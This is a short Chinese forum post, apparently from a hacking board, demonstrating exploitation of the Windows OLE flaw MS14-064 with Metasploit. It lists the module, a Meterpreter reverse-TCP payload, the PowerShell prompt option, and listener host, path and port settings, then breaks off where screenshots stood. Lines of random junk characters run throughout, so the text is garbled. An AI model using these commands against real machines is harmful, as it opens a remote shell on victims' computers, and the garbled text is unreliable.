6 ]% ?+ D. ^- k! b+ j" {$ {2 s 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示6 k1 y% Q% j% p! z( p0 B6 ]! Y" V" D
+ }: J8 @/ D& v' \8 W& D0 [
9 f7 M( R$ D) s: k4 }9 T
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
: r+ Q$ }" C% _$ @+ ]2 a1 O/ F
" [( o6 N. H' F' i+ U7 ^+ h& Q
) G( o9 d+ r& k! F" B: w
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
& l3 n0 ~, O6 R4 {0 }
( ]8 _6 K. A& |! [% r+ h1 B
4 j9 F9 Q) b5 @) U' z0 u: r* a0 f$ k
set AllowPowershellPrompt true
L. v1 C0 P1 F0 w8 D; r r
1 L+ H9 P9 F( E8 H, b; e9 g. v9 N4 W) C. U
Set LHOST 192.168.0.109
$ s! f+ Y# G( h) N
3 \; J& |. G: d% _+ [4 ^) I2 t
* v; q! s0 H @1 Q6 d3 |! } set SRVHOST 192.168.0.109) e- ^. C# N1 A- z
' S4 @: B8 A8 y3 a( H
8 \/ m% L# G: G G, ?5 k. t Set uripath share
8 P4 ]# x2 V% L
! d7 a. E1 R. v+ z* Y0 v E) S/ Y: S0 g2 |8 S1 W6 s
Set srvport 80. {$ S8 a' Z* ^ A
8 p: ~# X) x. v6 m7 p8 M& y
- s7 _: q) Y5 [: O5 K% W4 { e
p6 a [; `# w) G1 ?
1 v- p0 K3 y9 N+ E9 x
! G4 c) u$ b! @' b3 U; Q2 X W / ?- o! y1 B j3 u# k) H$ W3 @
+ ^9 o2 w4 i) E, B$ \! I6 w
( o: v$ ]: n. a7 K* k
0 Z, ~$ U0 d. j& i' h# C8 i; O
7 ?- N+ ?* B$ \: M5 k) j
6 U8 m6 `- _6 F0 B
) r' D; w" p% d6 h; R. `- ?2 n
9 C- L- L- H# x2 b, s' I1 M
: @' H* ]* b8 I$ x3 f( e9 R& c ! o0 u6 U; B* R. }. v) ~ R, B4 j
! W) R- t0 ]6 F0 K w" A
1 S6 @+ J @# y0 e2 ?
下面我们来访问本地地址如图:% v' m- i1 a) m/ p" Y) ]8 ?
! L S3 U) |3 B2 X; |' C1 X
/ {2 L8 r5 A4 O E3 c
0 y* Z& q* Z7 F# M$ G
t/ B0 U5 q' ~) r
5 R0 y8 N9 Z2 W- N* r 7 L, M7 G# E% O( ], [
8 f6 t0 ?1 Q& e) [' J5 e$ B, }
r2 J* L# o7 R v
8 R! l" s( h; M! k5 d